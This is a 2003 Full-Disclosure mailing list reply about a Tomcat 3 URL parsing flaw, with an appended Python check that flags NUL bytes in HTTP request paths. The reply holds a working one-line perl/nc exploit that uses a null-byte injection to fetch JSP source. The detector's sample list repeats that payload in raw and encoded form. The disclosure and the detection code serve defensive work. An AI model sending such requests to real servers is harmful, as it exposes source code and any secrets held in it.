Re: [Full-Disclosure] Apache Jakarta Tomcat 3 URL parsing vulnerability
From: Jouko Pynnonen (jouko@solutions.fi)
Date: 01/30/03
From: Jouko Pynnonen <jouko@solutions.fi>
To: <full-disclosure@lists.netsys.com>
Date: Thu, 30 Jan 2003 14:50:27 +0200 (EET)
One more thing: the vulnerability also allows remote users to retrieve
source of JSP files in this way:
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080
--
Jouko Pynnonen          Online Solutions Ltd      Secure your Linux -
jouko@solutions.fi      http://www.solutions.fi   http://www.secmod.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
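A defensive check for the request shape shown in the message above, as an added example that is not part of the original post: it flags a NUL byte in the request path, either raw as in the post or percent-encoded (a generalization the post itself does not cover). The sample request lines, the function names and the decode-round limit are constructed for illustration.

```python
from urllib.parse import unquote_to_bytes

MAX_DECODE_ROUNDS = 3  # assumption: how many layers of %-encoding to peel

# Constructed request lines, as raw bytes read from the socket.
SAMPLES = [
    b"GET /examples/jsp/cal/cal1.jsp HTTP/1.0",
    b"GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0",
    b"GET /examples/jsp/cal/cal1.jsp%00.html HTTP/1.0",
    b"GET /examples/jsp/cal/cal1.jsp%2500.html HTTP/1.0",
    b"GET /index.html?q=a%20b HTTP/1.0",
]


def nul_in_path(request_line: bytes):
    """Return None for a clean path, else a dict describing the finding."""
    try:
        _method, rest = request_line.split(b" ", 1)
        target, _version = rest.rsplit(b" ", 1)
    except ValueError:
        return {"reason": "malformed request line"}
    path = target.split(b"?", 1)[0]  # only the path component is checked here
    for rounds in range(MAX_DECODE_ROUNDS + 1):
        if b"\x00" in path:
            before, after = path.split(b"\x00", 1)
            return {
                "reason": "NUL in path",
                "decode_rounds": rounds,  # 0 means a raw NUL on the wire
                "before": before.decode("latin-1"),
                "after": after.decode("latin-1"),
            }
        decoded = unquote_to_bytes(path)
        if decoded == path:  # nothing left to decode
            break
        path = decoded
    return None


def scan(lines):
    """Map each flagged request line to its finding."""
    return {line: hit for line in lines if (hit := nul_in_path(line))}


if __name__ == "__main__":
    for line, hit in scan(SAMPLES).items():
        print(repr(line), "->", hit)
```

The `before` and `after` fields show the two extensions on either side of the NUL, which is the mismatch worth alerting on when a front-end filter and the servlet container may disagree about where the path ends.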